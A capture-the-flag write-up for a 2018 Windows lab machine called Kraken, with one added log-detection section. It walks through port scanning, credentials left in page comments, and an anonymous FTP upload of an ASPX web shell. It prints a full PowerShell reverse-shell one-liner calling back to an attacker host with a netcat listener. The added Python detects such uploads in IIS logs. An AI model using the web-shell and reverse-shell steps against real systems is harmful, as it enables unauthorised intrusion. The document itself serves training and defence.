Fatec Ourinhos CTF 2018: Writeup

Introduction

This post is a write-up for the 2nd edition of the Fatec Ourinhos CTF 2018, in which I describe in detail how I obtained the flag on the Kraken machine.

The machine's original name is Kraken; it was part of the personal penetration-testing lab I built in 2017 for my team, WATCHERS.

Challenge information

Name: Unleash the Kraken

Our target's IP address is 192.168.56.100 and its hostname is kraken.wtc.

Operating system: Windows

Enumeration and scanning phase

Nmap gave us the following output:

[root:~] nmap 192.168.56.100 -Pn -sT
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-16 14:22 PDT
Nmap scan report for 192.168.56.100
Host is up, received user-set (0.10s latency).
Not shown: 990 filtered ports
Reason: 990 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
80/tcp open http syn-ack
135/tcp open msrpc syn-ack
443/tcp open https syn-ack
1723/tcp open pptp syn-ack
3389/tcp open ms-wbt-server syn-ack
49153/tcp open unknown syn-ack
49154/tcp open unknown syn-ack
49156/tcp open unknown syn-ack
49157/tcp open unknown syn-ack
Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds

Clearly we have a website and an FTP server to test. The other services all require credentials, and we have none.

The website's page is just a picture of a kraken, as shown below:


Let's send a cURL request to the HTTP port and see what comes back:

[root:~] curl http://192.168.56.100
<html>
<body>
<div align="center">
<h1>Release the kraken!</h1>
<img src="kraken-pic.jpg"/>
</div>
<!-- Username: DavyJones -->
<!-- Password: #kr4kud0o0O -->
</body>
</html>

We got a set of credentials from the page source. Trying to log in to FTP (port 21) with them did not work, and trying RDP (port 3389) failed as well!

Vulnerability analysis

Next, I tried logging in to FTP with the anonymous account, and it actually worked:

[root:~] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,359,065,088 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-17-2018 01:08PM <DIR> kraken
05-17-2018 02:01PM <DIR> uploads
05-17-2018 01:08PM <DIR> App_Data
05-17-2018 11:26AM 189 index.html
05-17-2018 11:21AM 53404 kraken-pic.jpg
226-Directory has 49,359,065,088 bytes of disk space available.
226 Transfer complete.
ftp>

Through the anonymous FTP account we can reach the web root, so let's try uploading a file.

[root:/tmp] echo 'andre' >> file.txt
[root:/tmp] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,354,731,520 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> put file.txt
local: file.txt remote: file.txt
200 PORT command successful.
550 Access is denied.
ftp>

We don't have permission to upload here. But maybe another folder does? The uploads folder exists to receive files, so it should be writable!

ftp> cd uploads
250 CWD command successful.
ftp> put file.txt
local: file.txt remote: file.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
7 bytes sent in 0.00 secs (175.2805 kB/s)
ftp> exit
221 Goodbye.
[root:/tmp] curl http://192.168.56.100/uploads/file.txt
andre
[root:/tmp]

Exploitation

We now know a way to upload arbitrary files, and we can reach the uploaded file with a browser. So it is just a matter of uploading a web shell, which gives us a shell on the Kraken host.

[root:/tmp] cp /usr/share/webshells/aspx/cmdasp.aspx .
[root:/tmp] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,345,097,728 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> cd uploads
250 CWD command successful.
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (42.9749 MB/s)

Now open the webshell in a web browser and send commands!
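
Seen from the defender's side, the chain above (an anonymous FTP write into uploads/, then HTTP requests for the uploaded .aspx) is visible in IIS logs. The Python below is an added example, not part of the original write-up; its FTP and HTTP log lines are constructed in a simplified IIS W3C layout (the real field list is longer, but the parser is driven by the #Fields header, so it adapts), and the thresholds and extension list are assumptions.

```python
"""Flag anonymous FTP uploads of script files and correlate them with later HTTP
requests for the same path. Log lines below are constructed, IIS W3C-style."""
import os
from datetime import datetime

# Extensions IIS hands to a script engine; a .txt in uploads/ is inert on its own.
SCRIPT_EXTS = {".aspx", ".asp", ".ashx", ".asmx", ".config"}

FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status x-fullpath
2018-05-17 13:08:11 192.168.56.1 anonymous USER anonymous 331 -
2018-05-17 13:08:30 192.168.56.1 anonymous STOR file.txt 550 /file.txt
2018-05-17 13:08:45 192.168.56.1 anonymous STOR file.txt 226 /uploads/file.txt
2018-05-17 13:09:10 192.168.56.1 anonymous STOR cmdasp.aspx 226 /uploads/cmdasp.aspx
2018-05-17 13:20:00 192.168.56.1 DavyJones STOR report.aspx 226 /kraken/report.aspx
"""
HTTP_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2018-05-17 13:09:40 192.168.56.1 GET /uploads/cmdasp.aspx 200
2018-05-17 13:09:41 192.168.56.1 POST /uploads/cmdasp.aspx 200
2018-05-17 13:10:02 192.168.56.1 GET /uploads/file.txt 200
"""

def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def ts(row):
    return datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")

def suspicious_uploads(ftp_rows):
    """Successful (2xx) STOR of a script-type file by the anonymous account."""
    return [r for r in ftp_rows
            if r["cs-method"] == "STOR" and r["sc-status"].startswith("2")
            and r["cs-username"].lower() == "anonymous"
            and os.path.splitext(r["cs-uri-stem"])[1].lower() in SCRIPT_EXTS]

def correlate(ftp_rows, http_rows, window_s=3600):
    """Pair each suspicious upload with HTTP hits on the same path within the window.
    An upload followed by requests to it is the webshell pattern from the write-up."""
    alerts = []
    for up in suspicious_uploads(ftp_rows):
        hits = [h for h in http_rows
                if h["cs-uri-stem"].lower() == up["x-fullpath"].lower()
                and 0 <= (ts(h) - ts(up)).total_seconds() <= window_s]
        alerts.append({"path": up["x-fullpath"], "client": up["c-ip"], "hits": len(hits)})
    return alerts
```

The same logic applies unchanged to real IIS W3C log files; the fix on the server side is to disable anonymous authentication on the FTP site, or at minimum deny write access to any directory the web server serves.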

Getting a shell on the host

To get a shell, I used shellpop, the reverse shell generator I wrote, to obtain a shell on the host, as shown below:

[root:/tmp] shellpop --payload windows/reverse/tcp/powershell -H tun0 -P 443
[+] Execute this code in remote target:
powershell.exe -nop -ep bypass -Command "$cFYlLK='10.11.12.26';$BfKleTWqoeSd=443;$czOaNBi=New-Object System.Net.Sockets.TCPClient($cFYlLK,$BfKleTWqoeSd);$QHFXyM=$czOaNBi.GetStream();[byte[]]$xdjeYJjrFCJTTT=0..65535|%{0};$tBoRkCjv=([text.encoding]::ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$QHFXyM.Write($tBoRkCjv,0,$tBoRkCjv.Length);while(($LOlZmTcyLFlYNih=$QHFXyM.Read($xdjeYJjrFCJTTT,0,$xdjeYJjrFCJTTT.Length)) -ne 0){$qLUSJN=([text.encoding]::ASCII).GetString($xdjeYJjrFCJTTT,0,$LOlZmTcyLFlYNih);try{$yWMBwfso=(Invoke-Expression -c $qLUSJN 2>&1|Out-String)}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$cFYlLK0=$yWMBwfso+'PS '+(Get-Location).Path+'> ';$cFYlLK1=($cFYlLK2[0]|Out-String);$cFYlLK2.clear();$cFYlLK0=$cFYlLK0+$cFYlLK1;$tBoRkCjv=([text.encoding]::ASCII).GetBytes($cFYlLK0);$QHFXyM.Write($tBoRkCjv,0,$tBoRkCjv.Length);$QHFXyM.Flush();};$czOaNBi.Close();if($cFYlLK3){$cFYlLK3.Stop();};"
[+] This shell DOES NOT have a handler set.
[root:/tmp]# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49244.
PS C:\windows\system32\inetsrv>

Now we have a shell on the system. There are several ways to obtain SYSTEM privileges on this machine, but that belongs to the privilege escalation phase.

Privilege escalation

If you spend a little more time on system enumeration, you will quickly notice that this machine is missing many patches.

PS C:\windows\system32\inetsrv> Get-Hotfix | Where-Object { $_.Description -eq "Security Update" }
Source Description HotFixID InstalledBy InstalledOn
------ ----------- -------- ----------- -----------
KRAKEN Security Update KB2479943 6/15/2015 ...
KRAKEN Security Update KB2491683 6/15/2015 ..
